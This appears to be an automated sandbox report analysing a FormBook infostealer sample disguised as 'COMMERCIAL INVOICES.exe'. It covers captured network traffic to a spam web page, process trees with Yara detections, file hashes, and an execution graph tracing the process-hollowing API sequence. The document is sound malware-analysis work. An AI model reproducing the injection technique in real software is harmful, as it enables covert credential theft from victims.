                                                                                                                                                                                                                                    Data Ascii: b577<!DOCTYPE html><html mip=""><head><meta charset="utf-8" /><meta name="applicable-device" content="pc,mobile" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0" /><link rel="shortcut icon" href="//www.5711337.xyz/favicon.ico" type="image/x-icon" /><title>&#22836;&#21495;&#21069;&#22971;_www68caocom&#21494;&#20521;&#24420;&#28139;&#33633;&#26377;&#22768;&#23567;&#35828;&#35841;&#26377;H&#21160;&#28459;&#22270;&#29255;&#32593;&#31449;&#19969;&#39321;&#21307;&#23398;&#32593;-&#20122;&#27954;&#32508;&#21512;&#20132;&#28165;&#22270;&#21306;</title><meta name="keywords" content="&#22836;&#21495;&#21069;&#22971;_www68caocom&#21494;&#20521;&#24420;&#28139;&#33633;&#26377;&#22768;&#23567;&#35828;&#35841;&#26377;H&#21160;&#28459;&#22270;&#29255;&#32593;&#31449;&#19969;&#39321;&#21307;&#23398;&#32593;" / [TRUNCATED]
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.797815084 CEST1236INData Raw: 38 33 36 3b 26 23 32 31 34 39 35 3b 26 23 32 31 30 36 39 3b 26 23 32 32 39 37 31 3b e2 80 9d 26 23 32 36 31 35 39 3b 26 23 32 35 33 35 31 3b 26 23 31 39 39 36 38 3b 26 23 32 30 30 31 30 3b 26 23 32 32 38 39 39 3b 26 23 32 34 36 31 35 3b ef bc 8c
                                                                                                                                                                                                                                    Data Ascii: 836;&#21495;&#21069;&#22971;&#26159;&#25351;&#19968;&#20010;&#22899;&#24615;&#26366;&#32463;&#23233;&#32473;&#20102;&#19968;&#20301;&#38750;&#24120;&#25104;&#21151;&#30340;&#30007;&#24615;&#24182;&#22312;&#36825;&#27573;&#23130;&#2303
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.797837019 CEST1236INData Raw: 39 39 36 38 3b 26 23 32 30 30 31 30 3b 26 23 32 32 38 39 39 3b 26 23 32 34 36 31 35 3b ef bc 8c 26 23 32 36 33 36 36 3b 26 23 33 32 34 36 33 3b 26 23 32 33 32 33 33 3b 26 23 33 32 34 37 33 3b 26 23 32 30 31 30 32 3b 26 23 31 39 39 36 38 3b 26 23
                                                                                                                                                                                                                                    Data Ascii: 9968;&#20010;&#22899;&#24615;&#26366;&#32463;&#23233;&#32473;&#20102;&#19968;&#20301;&#38750;&#24120;&#25104;&#21151;&#30340;&#30007;&#24615;&#24182;&#22312;&#36825;&#27573;&#23130;&#23035;&#20013;&#25198;&#28436;&#20102;&#37325;&#35201;
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.798520088 CEST672INData Raw: 70 78 3b 7d 20 2e 68 65 61 66 65 72 79 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 33 33 33 3b 20 7d 20 2e 6e 61 76 20 6c 69 3a 68 6f 76 65 72 3e 61 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20
                                                                                                                                                                                                                                    Data Ascii: px;} .heaferys { background-color: #333333; } .nav li:hover>a { background-color: #838c92; } .nav li.active>a { background-color: #838c92; } .nav ul ul { background-color: #838c92; } .nav ul li:hover>ul { background-color: #838c92; } .nav ul u
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.798537970 CEST1236INData Raw: 3a 20 23 66 66 36 36 30 30 3b 20 7d 20 2e 71 6b 5f 6f 6e 65 62 6f 78 5f 7a 68 6f 6e 67 5f 74 62 74 20 65 6d 20 68 31 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 34 34 34 34 34 3b 20 7d 20 2e 71 6b 5f 6f 6e 65 62 6f 78 5f 7a 68 6f 6e 67 5f
                                                                                                                                                                                                                                    Data Ascii: : #ff6600; } .qk_onebox_zhong_tbt em h1 { background: #444444; } .qk_onebox_zhong_tbt em h2 { color: #444444; } .qk_ibox3_z_btgg em { background: #444444; } .qk_ibox3_z_btgg p { color: #444444; } .hometab .title li.active a { color: #444444; }
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.799335957 CEST1236INData Raw: 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69 20 61 7b 63 6f 6c 6f 72 3a 23 39 39 39 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 32 30 70 78 7d 20 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69
                                                                                                                                                                                                                                    Data Ascii: .m_menu ul.menu li a{color:#999;display:block;padding:8px 20px} .m_menu ul.menu li .ul-subcates{display:block;margin-left:20px;border-top:1px rgba(255,255,255,0.1) solid} .m_menu ul.menu li .ul-subcates>li:first-child{border-top:0} .m_menu ul.
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.799354076 CEST1236INData Raw: 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 3e 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 20 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c
                                                                                                                                                                                                                                    Data Ascii: .current-menu-item>a{color:#fff} .m_menu ul.menu li:hover{background-color:rgba(0,0,0,0.2)} .m_menu ul.menu li:hover>a{color:#fff} .m_menu ul.menu li:hover>span.menu_btn:before,.m_menu ul.menu li:hover>span.menu_btn:after{color:#fff} .lightbox
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.800157070 CEST1236INData Raw: 70 7a 6f 6e 65 3d 22 32 64 33 33 31 34 22 3e 3c 2f 62 64 6f 3e 3c 64 66 6e 20 64 61 74 65 2d 74 69 6d 65 3d 22 62 36 36 64 64 35 22 3e 3c 2f 64 66 6e 3e 3c 66 6f 6e 74 20 64 69 72 3d 22 30 66 35 65 37 35 22 3e 3c 2f 66 6f 6e 74 3e 3c 64 69 76 20
                                                                                                                                                                                                                                    Data Ascii: pzone="2d3314"></bdo><dfn date-time="b66dd5"></dfn><font dir="0f5e75"></font><div dropzone="17ad6a" id="monavber" class="e17ad6 nav heaferys" data-type="index" data-infoid=""><ins lang="5b5756"></ins><small draggable="79e894"></small><sup drop
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.800178051 CEST1236INData Raw: 97 b4 e7 94 b1 e7 be 8e 22 20 74 69 74 6c 65 3d 22 e9 a3 8e e9 97 b4 e7 94 b1 e7 be 8e 22 3e e9 a3 8e e9 97 b4 e7 94 b1 e7 be 8e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 69 64 3d 22 6e 61 76 62 61 72 2d 63 61 74 65 67 6f 72 79 2d 32 22 3e 3c 61 20
                                                                                                                                                                                                                                    Data Ascii: " title=""></a></li><li id="navbar-category-2"><a href="http://www.5711337.xyz/gongdilan/" data-type="mip" data-title="" title=""></a></li><li id="navbar-category-2"><a href="http://ww
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.800194979 CEST1236INData Raw: 30 22 3e 3c 2f 74 69 6d 65 3e 3c 64 69 76 20 64 72 61 67 67 61 62 6c 65 3d 22 64 30 61 62 36 34 22 20 63 6c 61 73 73 3d 22 6d 62 32 63 30 39 20 6c 75 6a 69 6e 67 32 32 22 3e 3c 74 74 20 6c 61 6e 67 3d 22 63 31 39 32 30 34 22 3e 3c 2f 74 74 3e 3c
                                                                                                                                                                                                                                    Data Ascii: 0"></time><div draggable="d0ab64" class="mb2c09 lujing22"><tt lang="c19204"></tt><var draggable="595b7a"></var><area dropzone="630d25"></area><div dropzone="7eb9dd" id="pt" class="n63709 bm cl"><map date-time="064f43"></map><bdo dir="fff0b4"><
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.803169012 CEST1236INData Raw: 3c 2f 69 6e 73 3e 3c 73 6d 61 6c 6c 20 64 61 74 65 2d 74 69 6d 65 3d 22 33 30 63 37 38 31 22 3e 3c 2f 73 6d 61 6c 6c 3e 3c 64 69 76 20 64 69 72 3d 22 39 65 30 36 63 33 22 20 69 64 3d 22 6d 61 69 6e 22 3e 3c 73 75 70 20 64 69 72 3d 22 34 64 33 38
                                                                                                                                                                                                                                    Data Ascii: </ins><small date-time="30c781"></small><div dir="9e06c3" id="main"><sup dir="4d38b2"></sup><time lang="1d89d4"></time><tt draggable="23b8f1"></tt><div lang="b2c09f" class="q5fb16 main container"><var dropzone="165fe6"></var><area date-time="4


                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:09:08:22
                                                                                                                                                                                                                                    Start date:11/10/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\COMMERCIAL INVOICES.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"
                                                                                                                                                                                                                                    Imagebase:0x6f0000
                                                                                                                                                                                                                                    File size:717'832 bytes
                                                                                                                                                                                                                                    MD5 hash:57CCF777596297F30D94BC1394D4B38F
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:09:08:56
                                                                                                                                                                                                                                    Start date:11/10/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\COMMERCIAL INVOICES.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"
                                                                                                                                                                                                                                    Imagebase:0x770000
                                                                                                                                                                                                                                    File size:717'832 bytes
                                                                                                                                                                                                                                    MD5 hash:57CCF777596297F30D94BC1394D4B38F
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:09:09:04
                                                                                                                                                                                                                                    Start date:11/10/2024
                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe"
                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                    File size:140'800 bytes
                                                                                                                                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                    Start time:09:09:06
                                                                                                                                                                                                                                    Start date:11/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\taskkill.exe"
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:74'240 bytes
                                                                                                                                                                                                                                    MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                    Start time:09:09:19
                                                                                                                                                                                                                                    Start date:11/10/2024
                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe"
                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                    File size:140'800 bytes
                                                                                                                                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                    Start time:09:09:31
                                                                                                                                                                                                                                    Start date:11/10/2024
                                                                                                                                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                    Imagebase:0x7ff79f9e0000
                                                                                                                                                                                                                                    File size:676'768 bytes
                                                                                                                                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:9%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                      Signature Coverage:5.1%
                                                                                                                                                                                                                                      Total number of Nodes:175
                                                                                                                                                                                                                                      Total number of Limit Nodes:12
                                                                                                                                                                                                                                      execution_graph 22034 7135362 22036 7135184 22034->22036 22035 71354cc 22036->22034 22036->22035 22037 7135b69 12 API calls 22036->22037 22038 7135b78 12 API calls 22036->22038 22039 7135bec 12 API calls 22036->22039 22037->22035 22038->22035 22039->22035 21855 2baaf98 21856 2baafda 21855->21856 21857 2baafe0 GetModuleHandleW 21855->21857 21856->21857 21858 2bab00d 21857->21858 22040 2ba4668 22041 2ba467a 22040->22041 22042 2ba4686 22041->22042 22044 2ba4783 22041->22044 22045 2ba479d 22044->22045 22049 2ba4883 22045->22049 22053 2ba4888 22045->22053 22051 2ba48af 22049->22051 22050 2ba498c 22050->22050 22051->22050 22057 2ba44b4 22051->22057 22055 2ba48af 22053->22055 22054 2ba498c 22055->22054 22056 2ba44b4 CreateActCtxA 22055->22056 22056->22054 22058 2ba5918 CreateActCtxA 22057->22058 22060 2ba59db 22058->22060 22061 7136d20 22062 7136eab 22061->22062 22064 7136d46 22061->22064 22064->22062 22065 71347ec 22064->22065 22066 7136fa0 PostMessageW 22065->22066 22067 713700c 22066->22067 22067->22064 21859 71353d7 21860 71353a7 21859->21860 21860->21859 21861 71354cc 21860->21861 21865 7135b69 21860->21865 21881 7135bec 21860->21881 21898 7135b78 21860->21898 21866 7135b7a 21865->21866 21914 71361d2 21866->21914 21922 71362e9 21866->21922 21927 71362cb 21866->21927 21932 713640b 21866->21932 21937 7136527 21866->21937 21942 7135ea0 21866->21942 21948 7136a19 21866->21948 21952 713661a 21866->21952 21956 7136375 21866->21956 21960 7136476 21866->21960 21967 7136450 21866->21967 21972 7136010 21866->21972 21978 7135eb0 21866->21978 21867 7135bb6 21867->21861 21882 7135b7a 21881->21882 21884 7135bfa 21881->21884 21885 71361d2 4 API calls 21882->21885 21886 7135eb0 2 API calls 21882->21886 21887 7136010 2 API calls 21882->21887 21888 7136450 2 API calls 21882->21888 21889 7136476 4 API calls 21882->21889 21890 7136375 2 API calls 21882->21890 21891 713661a 2 API calls 21882->21891 21892 7136a19 2 API calls 21882->21892 21893 7135ea0 2 API calls 21882->21893 21894 7136527 2 API calls 21882->21894 21895 713640b 2 API calls 21882->21895 21896 71362cb 2 API calls 21882->21896 21897 71362e9 2 API calls 21882->21897 21883 7135bb6 21883->21861 21884->21861 21885->21883 21886->21883 21887->21883 21888->21883 21889->21883 21890->21883 21891->21883 21892->21883 21893->21883 21894->21883 21895->21883 21896->21883 21897->21883 21899 7135b92 21898->21899 21901 71361d2 4 API calls 21899->21901 21902 7135eb0 2 API calls 21899->21902 21903 7136010 2 API calls 21899->21903 21904 7136450 2 API calls 21899->21904 21905 7136476 4 API calls 21899->21905 21906 7136375 2 API calls 21899->21906 21907 713661a 2 API calls 21899->21907 21908 7136a19 2 API calls 21899->21908 21909 7135ea0 2 API calls 21899->21909 21910 7136527 2 API calls 21899->21910 21911 713640b 2 API calls 21899->21911 21912 71362cb 2 API calls 21899->21912 21913 71362e9 2 API calls 21899->21913 21900 7135bb6 21900->21861 21901->21900 21902->21900 21903->21900 21904->21900 21905->21900 21906->21900 21907->21900 21908->21900 21909->21900 21910->21900 21911->21900 21912->21900 21913->21900 21984 7134620 21914->21984 21988 7134619 21914->21988 21915 71361f4 21916 713692e 21915->21916 21992 71346e0 21915->21992 21996 71346d8 21915->21996 21916->21867 21917 713655f 21923 71362ee 21922->21923 22000 7134491 21923->22000 22004 7134498 21923->22004 21924 71369e6 21928 7136454 21927->21928 21930 71346e0 WriteProcessMemory 21928->21930 21931 71346d8 WriteProcessMemory 21928->21931 21929 7136828 21930->21929 21931->21929 21933 7136411 21932->21933 21935 7134491 ResumeThread 21933->21935 21936 7134498 ResumeThread 21933->21936 21934 71369e6 21935->21934 21936->21934 21938 713652d 21937->21938 21940 71346e0 WriteProcessMemory 21938->21940 21941 71346d8 WriteProcessMemory 21938->21941 21939 713655f 21940->21939 21941->21939 21943 7135ee3 21942->21943 21944 713600a 21943->21944 22008 7134d68 21943->22008 22012 7134d5c 21943->22012 21944->21867 21950 71346e0 WriteProcessMemory 21948->21950 21951 71346d8 WriteProcessMemory 21948->21951 21949 7136a47 21950->21949 21951->21949 22016 7134540 21952->22016 22020 7134548 21952->22020 21953 7136634 21953->21867 22024 7134bd0 21956->22024 22028 7134bc8 21956->22028 21957 7136296 21957->21867 21965 7134540 Wow64SetThreadContext 21960->21965 21966 7134548 Wow64SetThreadContext 21960->21966 21961 7136490 21963 7134491 ResumeThread 21961->21963 21964 7134498 ResumeThread 21961->21964 21962 71369e6 21963->21962 21964->21962 21965->21961 21966->21961 21968 7136454 21967->21968 21970 71346e0 WriteProcessMemory 21968->21970 21971 71346d8 WriteProcessMemory 21968->21971 21969 7136828 21970->21969 21971->21969 21973 713600a 21972->21973 21974 7135f75 21972->21974 21973->21867 21974->21973 21976 7134d68 CreateProcessA 21974->21976 21977 7134d5c CreateProcessA 21974->21977 21975 71360d1 21975->21867 21976->21975 21977->21975 21980 7135ee3 21978->21980 21979 713600a 21979->21867 21980->21979 21982 7134d68 CreateProcessA 21980->21982 21983 7134d5c CreateProcessA 21980->21983 21981 71360d1 21981->21867 21982->21981 21983->21981 21985 7134660 VirtualAllocEx 21984->21985 21987 713469d 21985->21987 21987->21915 21989 7134620 VirtualAllocEx 21988->21989 21991 713469d 21989->21991 21991->21915 21993 71346f1 WriteProcessMemory 21992->21993 21995 713477f 21993->21995 21995->21917 21997 71346df WriteProcessMemory 21996->21997 21999 713477f 21997->21999 21999->21917 22001 7134498 ResumeThread 22000->22001 22003 7134509 22001->22003 22003->21924 22005 71344d8 ResumeThread 22004->22005 22007 7134509 22005->22007 22007->21924 22009 7134df1 22008->22009 22009->22009 22010 7134f56 CreateProcessA 22009->22010 22011 7134fb3 22010->22011 22011->22011 22013 7134d68 CreateProcessA 22012->22013 22015 7134fb3 22013->22015 22015->22015 22017 713458d Wow64SetThreadContext 22016->22017 22019 71345d5 22017->22019 22019->21953 22021 713458d Wow64SetThreadContext 22020->22021 22023 71345d5 22021->22023 22023->21953 22025 7134c1b ReadProcessMemory 22024->22025 22027 7134c5f 22025->22027 22027->21957 22029 7134bd0 ReadProcessMemory 22028->22029 22031 7134c5f 22029->22031 22031->21957 22032 2bad690 DuplicateHandle 22033 2bad726 22032->22033 22068 2bad040 22069 2bad086 GetCurrentProcess 22068->22069 22071 2bad0d8 GetCurrentThread 22069->22071 22072 2bad0d1 22069->22072 22073 2bad10e 22071->22073 22074 2bad115 GetCurrentProcess 22071->22074 22072->22071 22073->22074 22077 2bad14b 22074->22077 22075 2bad173 GetCurrentThreadId 22076 2bad1a4 22075->22076 22077->22075

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 07138260 Relevance: .6, Instructions: 615COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f95b50a814c7b4dda151780d07dcd7f2e760fb3b8d514cfdf39cc2ff7b38e61d
                                                                                                                                                                                                                                      • Instruction ID: 5673767fe7203771a0a4946dc44c724fc50a5cd112ca2522703e8fada2625125
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f95b50a814c7b4dda151780d07dcd7f2e760fb3b8d514cfdf39cc2ff7b38e61d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD327BB0B012059FDB15DB79C5A0BAEBBF6AF89300F6444A9E505DB3A1CB35ED01CB61
                                                                                                                                                                                                                                      Function 07135EB0 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9f68fce320a02efe2dfd0a0dfda9f19e665a3f0c9478c35de580969cffed1dac
                                                                                                                                                                                                                                      • Instruction ID: c4c68a3e8be028f07767329a071d2c077f3e3b14cab7d9b2e1c915f87b63d63d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f68fce320a02efe2dfd0a0dfda9f19e665a3f0c9478c35de580969cffed1dac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 347108B1D15629DBDB28CF66C8457E9FBB6BF89300F1091AAD40DA6290EB705A85CF40
                                                                                                                                                                                                                                      Function 02BAD031 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 526 2bad031-2bad0cf GetCurrentProcess 530 2bad0d8-2bad10c GetCurrentThread 526->530 531 2bad0d1-2bad0d7 526->531 532 2bad10e-2bad114 530->532 533 2bad115-2bad149 GetCurrentProcess 530->533 531->530 532->533 535 2bad14b-2bad151 533->535 536 2bad152-2bad16d call 2bad621 533->536 535->536 539 2bad173-2bad1a2 GetCurrentThreadId 536->539 540 2bad1ab-2bad20d 539->540 541 2bad1a4-2bad1aa 539->541 541->540
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 02BAD0BE
                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 02BAD0FB
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 02BAD138
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02BAD191
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2063062207-0
